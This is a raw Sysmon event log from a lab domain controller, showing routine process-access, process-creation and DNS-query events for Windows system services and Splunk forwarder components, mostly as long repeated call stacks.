13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.335{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.010{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine0fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.010{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine010.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:26.532{59A5CD1D-8E62-6005-7400-00000000A301}31683480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:26.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.392{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.195{59A5CD1D-8E62-6005-7400-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.200{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-4950fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.200{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-495010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.011{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
